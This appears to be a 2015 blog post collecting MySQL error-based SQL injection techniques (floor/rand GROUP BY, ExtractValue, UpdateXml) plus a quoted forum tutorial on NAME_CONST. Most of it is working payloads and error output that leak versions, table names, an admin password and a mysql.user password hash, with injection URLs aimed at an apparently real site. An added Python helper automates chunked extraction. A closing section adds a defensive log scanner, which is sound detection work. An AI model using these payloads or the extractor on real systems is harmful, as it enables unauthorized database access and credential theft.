
MySQL: exploiting the three error-based injection modes floor, ExtractValue and UpdateXml

Posted on 2015-11-11 19:03:37

1. Errors via floor()

The following payloads can be used:

and (select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a);

and (select count(*) from (select 1 union select null union select !1)x group by concat((select table_name from information_schema.tables limit 1),floor(rand(0)*2)));

Why this raises an error: rand(0) is seeded, so floor(rand(0)*2) always yields the sequence 0,1,1,0,1,1,... When GROUP BY inserts a new group into its temporary table it evaluates the key expression a second time, so the key it inserts can differ from the key it just looked up; within a few rows it tries to insert a group key that already exists and MySQL reports a duplicate entry, with the concatenated value in the message. The derived table needs at least three rows, which is why the second form unions three rows together and the first reads from information_schema.tables.

Example. First run a normal query:

mysql> select * from article where id = 1;
+----+-------+---------+
| id | title | content |
+----+-------+---------+
|  1 | test  | do it   |
+----+-------+---------+

If the id parameter is injectable, the following statement triggers the error:

mysql> select * from article where id = 1 and (select 1 from  (select count(*),concat(version(),floor(rand(0)*2))x from  information_schema.tables group by x)a);
ERROR 1062 (23000): Duplicate entry '5.1.33-community-log1' for key 'group_key'

The MySQL version is leaked successfully (the trailing 1 is the floor(rand(0)*2) digit appended by concat(), not part of the value). To read other data, replace version() with the expression you want.
For example, to fetch the administrator's username and password:

Method 1:

mysql> select * from article where id = 1 and (select 1 from (select count(*),concat((select pass from admin where id=1),floor(rand(0)*2))x from information_schema.tables group by x)a);
ERROR 1062 (23000): Duplicate entry 'admin8881' for key 'group_key'

Method 2:

mysql> select * from article where id = 1 and (select count(*) from (select 1 union select null union select !1)x group by concat((select pass from admin limit 1),floor(rand(0)*2)));
ERROR 1062 (23000): Duplicate entry 'admin8881' for key 'group_key'

2. ExtractValue

Test statement:

and extractvalue(1, concat(0x5c, (select table_name from information_schema.tables limit 1)));

Actual test:

mysql> select * from article where id = 1 and extractvalue(1, concat(0x5c,(select pass from admin limit 1)));
ERROR 1105 (HY000): XPATH syntax error: '\admin888'

0x5c is a backslash; any character that cannot begin an XPath expression works as the marker (0x7e, '~', is the usual choice). ExtractValue and UpdateXml exist from MySQL 5.1.5 onwards. Note that the XPATH syntax error text is cut at 32 characters including the marker, so longer values have to be read in pieces with substr() or mid().

3. UpdateXml

Test statement:

and 1=(updatexml(1,concat(0x3a,(select user())),1))

Actual test:

mysql> select * from article where id = 1 and 1=(updatexml(1,concat(0x3a,(select user())),1));
ERROR 1105 (HY000): XPATH syntax error: ':root@localhost'
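The three error channels above (floor/GROUP BY, ExtractValue, UpdateXml) all leak the value inside an error string that the attacker has to parse back out, and the XPath variants truncate it at 32 characters. The following is an added example, not code from the original post: it builds the three payloads, parses the resulting MySQL error text, and pages through a value longer than one XPath error can carry. It uses 0x7e as the marker instead of the post's 0x5c/0x3a, and the "target" is a constructed stand-in that returns the error text MySQL would raise for the post's admin/mysql.user examples; the leaked values are constructed.

```python
import re

# Added illustration, not code from the original post. It generates the three
# error-based payloads the post shows (floor/group by, extractvalue, updatexml),
# parses the MySQL error text they produce, and pages through a value that is
# longer than one XPath error can carry. Table/column names are the post's
# examples; the leaked values and the target are constructed.

XPATH_MARKER = "~"            # 0x7e: cannot begin an XPath expression (assumption: any such char works)
XPATH_ERR_MAX = 32            # MySQL cuts the XPATH syntax error text at 32 characters
XPATH_WINDOW = XPATH_ERR_MAX - len(XPATH_MARKER)   # 31 data characters per error


def payload_floor(expr):
    """Duplicate-entry error. floor(rand(0)*2) yields the fixed sequence 0,1,1,0,1,1,...
    and GROUP BY re-evaluates it on insert, so the derived table needs >= 3 rows;
    information_schema.tables always has enough."""
    return ("and (select 1 from (select count(*),concat((%s),floor(rand(0)*2))x "
            "from information_schema.tables group by x)a)" % expr)


def payload_extractvalue(expr):
    """XPATH syntax error carrying the value after the marker."""
    return "and extractvalue(1,concat(0x%02x,(%s)))" % (ord(XPATH_MARKER), expr)


def payload_updatexml(expr):
    """Same error channel as extractvalue, via the XML update function."""
    return "and updatexml(1,concat(0x%02x,(%s)),1)" % (ord(XPATH_MARKER), expr)


def window(expr, offset):
    """Wrap expr in substr() so one error carries characters offset..offset+30."""
    return "substr((%s),%d,%d)" % (expr, offset, XPATH_WINDOW)


FLOOR_RE = re.compile(r"Duplicate entry '(.*)' for key '")
XPATH_RE = re.compile(r"XPATH syntax error: '(.*)'")


def parse_floor(msg):
    """Recover the value from 'Duplicate entry ... for key ...'. The last character is
    the floor(rand(0)*2) digit that concat() appended, not part of the data."""
    m = FLOOR_RE.search(msg)
    return m.group(1)[:-1] if m else None


def parse_xpath(msg, marker=XPATH_MARKER):
    """Recover the value from 'XPATH syntax error: ...', dropping the leading marker."""
    m = XPATH_RE.search(msg)
    if not m:
        return None
    val = m.group(1)
    return val[len(marker):] if val.startswith(marker) else val


def extract_xpath(send, expr):
    """Read a value in substr() windows until a short or empty chunk comes back.
    send(payload) must return the server's error text ('' if no error was raised)."""
    out, offset = "", 1
    while True:
        chunk = parse_xpath(send(payload_extractvalue(window(expr, offset))))
        if not chunk:          # None: no error (value was NULL); '': past the end
            break
        out += chunk
        if len(chunk) < XPATH_WINDOW:
            break
        offset += XPATH_WINDOW
    return out


def fake_target(secret):
    """Constructed stand-in for the vulnerable page. It only understands the windowed
    extractvalue payload and returns the error text MySQL would raise, truncated the
    way the server truncates it. A real target returns this text in the HTTP body."""
    win_re = re.compile(r"substr\(\(.*\),(\d+),(\d+)\)")

    def send(payload):
        send.calls.append(payload)
        m = win_re.search(payload)
        off, length = int(m.group(1)), int(m.group(2))
        chunk = secret[off - 1:off - 1 + length]
        text = (XPATH_MARKER + chunk)[:XPATH_ERR_MAX]
        return "ERROR 1105 (HY000): XPATH syntax error: '%s'" % text

    send.calls = []
    return send


if __name__ == "__main__":
    print(parse_floor("ERROR 1062 (23000): Duplicate entry '5.1.33-community-log1' for key 'group_key'"))
    target = fake_target("*B7B1A4F45D9E638FAEB750F0A99935634CFF6C82")   # constructed 41-char hash
    print(extract_xpath(target, "select password from mysql.user limit 1"), len(target.calls))
```

The 41-character hash needs two requests (31 + 10 characters); a value whose length is an exact multiple of 31 costs one extra request that returns only the marker, which is how the loop learns it is done. Against a real target, `send` would issue the HTTP request and return the database error text found in the response body.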


Further collected material:

The same idea with NAME_CONST, where the error is a duplicate column name produced by joining two derived tables that carry the same column name:

http://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261 and exists(select*from (select*from(select name_const(@@version,0))a join (select name_const(@@version,0))b)c)

Error: Duplicate column name '5.0.27-community-nt'

http://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261 and exists(select*from (select*from(select name_const((select concat(user,password) from mysql.user limit 0,1),0))a join (select name_const((select concat(user,password) from mysql.user limit 0,1),0))b)c)

Error: Duplicate column name 'root*B7B1A4F45D9E638FAEB750F0A99935634CFF6C82'
Error-based injection tricks for higher MySQL versions: injection via NAME_CONST

It's been a while since I've made an SQL Injection tutorial, so I thought I should make a new tutorial using the method name_const. There aren't many papers documenting this method, so it feels kind of good to be the one to make a guide for it.

Background

NAME_CONST was added in MySQL 5.0.12, so it won't work on anything less than that.

Code:
NAME_CONST(DATA, VALUE)

Returns the given value. When used to produce a result set column, NAME_CONST() causes the column to have the given name. The arguments should be constants.

Later MySQL releases enforce that last sentence: a non-constant first argument such as version() or a subquery fails with ERROR 1210 (HY000): Incorrect arguments to NAME_CONST instead of producing the duplicate-column error. That is the "invalid calls to NAME_CONST" failure mentioned further down, and it is why the technique is mainly useful against old 5.0.x servers like the 5.0.27 one in these examples.

SELECT NAME_CONST('TEST', 1)

+------+
| TEST |
+------+
|    1 |
+------+

http://dev.mysql.com/doc/refman/5.0/en/m...name-const

Intro to MySQL Variables

Once you've got your vulnerable site, let's try getting some MySQL system variables using NAME_CONST.

Code:
http://www.baido.hk/qcwh/content ... ;sid=19&cid=261

Code:
and+1=(select+*+from+(select+NAME_CONST(VAR,1),NAME_CONST(VAR,1))+as+x)--

VAR = Your MySQL variable.

MySQL 5.1.3 Server System Variables

Let's try it out on my site..

Code:
http://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261+and+1=(select+*+from+(select+NAME_CONST(version(),1),NAME_CONST(version(),1))+as+x)--

Error: Duplicate column name '5.0.27-community-nt'

Now I've tried a couple of sites, and I was getting invalid calls to NAME_CONST trying to extract data. Nothing was wrong with my syntax, it just wouldn't work there. Luckily, they work here so let's get this going again...

Data Extraction

Code:
+and+1=(select+*+from+(select+NAME_CONST((select+DATA+limit+0,1),1),NAME_CONST((select+DATA+limit+0,1),1))+as+x)--

We should get a duplicate column '1' error...

Code:
http://www.baido.hk/qcwh/content ... &cid=261+and+1=(select+*+from+(select+NAME_CONST((select+1+limit+0,1),1),NAME_CONST((select+1+limit+0,1),1))+as+x)--

Error: Duplicate column name '1'


Now let's get the tables out of this bitch..

Code:
+and+1=(select+*+from+(select+NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1),NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1))+as+x)--

Let's see if it works here; if it does, we can go on and finish the job.

Code:
http://www.baido.hk/qcwh/content ... &cid=261+and+1=(select+*+from+(select+NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1),NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1))+as+x)--

Error: Duplicate column name 'com_admanage'

Now I'm going to be lazy and use mysql.user as an example, just for the sake of time.

Let's get the columns out of the user table..

Code:
+and+1=(select+*+from+(select+NAME_CONST((select+column_name+from+information_schema.columns+where+table_name=0xHEX_OF_TABLENAME+limit+0,1),1),NAME_CONST((select+column_name+from+information_schema.columns+where+table_name=0xHEX_OF_TABLENAME+limit+0,1),1))+as+x)--

So mine looks like this, and I get the duplicate column name 'Host'.

Code:
http://www.baido.hk/qcwh/content ... &cid=261+and+1=(select+*+from+(select+NAME_CONST((select+column_name+from+information_schema.columns+where+table_schema=0x6d7973716c+and+table_name=0x75736572+limit+0,1),1),NAME_CONST((select+column_name+from+information_schema.columns+where+table_schema=0x6d7973716c+and+table_name=0x75736572+limit+0,1),1))+as+x)--

Error: Duplicate column name 'Host'

Woot, time to finish this bitch off.

Code:
+and+1=(select+*+from+(select+NAME_CONST((select+concat_ws(0x207e20,COLUMN1,COLUMN2)+from+TABLENAME+limit+0,1),1),NAME_CONST((select+concat_ws(0x207e20,COLUMN1,COLUMN2)+from+TABLENAME+limit+0,1),1))+as+x)--


So mine looks like this...

Code:
http://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261+and+1=(select+*+from+(select+NAME_CONST((select+concat_ws(0x207e20,User,Password)+from+mysql.user+limit+0,1),1),NAME_CONST((select+concat_ws(0x207e20,User,Password)+from+mysql.user+limit+0,1),1))+as+x)--

Error: Duplicate column name 'root ~ *B7B1A4F45D9E638FAEB750F0A99935634CFF6C82'

And there we have it, thanks for reading.
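The defensive side of the four payload families on this page (floor/GROUP BY, ExtractValue, UpdateXml and NAME_CONST), as an added example that is not part of the original post or of the quoted tutorial: a small scanner that decodes request URLs from access-log lines and flags each family, plus a classifier for the database error strings that leak into responses. The log lines are constructed in combined log format; the host path mirrors the post's example URL but the addresses, timestamps and sizes are made up.

```python
import re
from urllib.parse import unquote_plus

# Added illustration, not part of the original post: request-side detection of the
# error-based payload families shown on this page, run over constructed access-log
# lines (combined log format; addresses, timestamps and sizes are made up).
SAMPLE_LOG = """\
203.0.113.5 - - [11/Nov/2015:19:03:37 +0800] "GET /qcwh/content/detail.php?id=330&sid=19&cid=261 HTTP/1.1" 200 5120
203.0.113.5 - - [11/Nov/2015:19:03:41 +0800] "GET /qcwh/content/detail.php?id=330+and+1=(select+*+from+(select+NAME_CONST(version(),1),NAME_CONST(version(),1))+as+x)-- HTTP/1.1" 500 712
203.0.113.5 - - [11/Nov/2015:19:03:45 +0800] "GET /qcwh/content/detail.php?id=1%20and%20extractvalue(1,concat(0x5c,(select%20pass%20from%20admin%20limit%201))) HTTP/1.1" 500 690
203.0.113.5 - - [11/Nov/2015:19:03:49 +0800] "GET /qcwh/content/detail.php?id=1%20and%20(select%201%20from%20(select%20count(*),concat(version(),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a) HTTP/1.1" 500 701
203.0.113.5 - - [11/Nov/2015:19:03:53 +0800] "GET /qcwh/content/detail.php?id=1/**/and/**/1=(UpDaTeXmL(1,concat(0x3a,(select%20user())),1)) HTTP/1.1" 500 688
198.51.100.7 - - [11/Nov/2015:19:04:02 +0800] "GET /qcwh/content/detail.php?id=331 HTTP/1.1" 200 5100
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<url>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+)')

# One rule per error channel. The floor rule requires both halves of the trick
# (floor(rand( and GROUP BY), since floor(rand()) alone is common in honest SQL.
RULES = (
    ("floor_rand_groupby", re.compile(r"\bfloor\s*\(\s*rand\s*\(.*\bgroup\s+by\b", re.I | re.S)),
    ("xpath_error", re.compile(r"\b(extractvalue|updatexml)\s*\(", re.I)),
    ("name_const", re.compile(r"\bname_const\s*\(", re.I)),
)

# Error strings each channel leaves in a response body when the app echoes DB errors.
DB_ERRORS = (
    ("floor_rand_groupby", "Duplicate entry '"),
    ("xpath_error", "XPATH syntax error: '"),
    ("name_const", "Duplicate column name '"),
)


def normalize(url):
    """Undo the encodings an attacker uses to dodge naive string matching."""
    s = unquote_plus(url)
    s = unquote_plus(s)                  # one level of double encoding (also maps a literal '+' to space)
    s = re.sub(r"/\*.*?\*/", " ", s)     # /**/ comments used as whitespace
    return s


def detect(line):
    """Return a finding dict for a log line that carries one of the payloads, else None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    query = normalize(m.group("url"))
    rules = [name for name, rx in RULES if rx.search(query)]
    if not rules:
        return None
    return {"ip": m.group("ip"), "ts": m.group("ts"),
            "status": int(m.group("status")), "rules": rules}


def scan(text):
    """Findings for every line of an access log, in file order."""
    return [f for f in (detect(line) for line in text.splitlines()) if f]


def classify_db_error(body):
    """Name the error channel(s) whose MySQL error text appears in a response body."""
    return [name for name, needle in DB_ERRORS if needle in body]


if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

Each hit comes with the HTTP status, and in this sample every flagged request returned 500, which is the combination worth alerting on: the request carries an error-provoking expression and the application answered with an error page. The `classify_db_error` check is for the response side; an application that never echoes the database error text to the client takes all four channels away regardless of which function the attacker picks.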
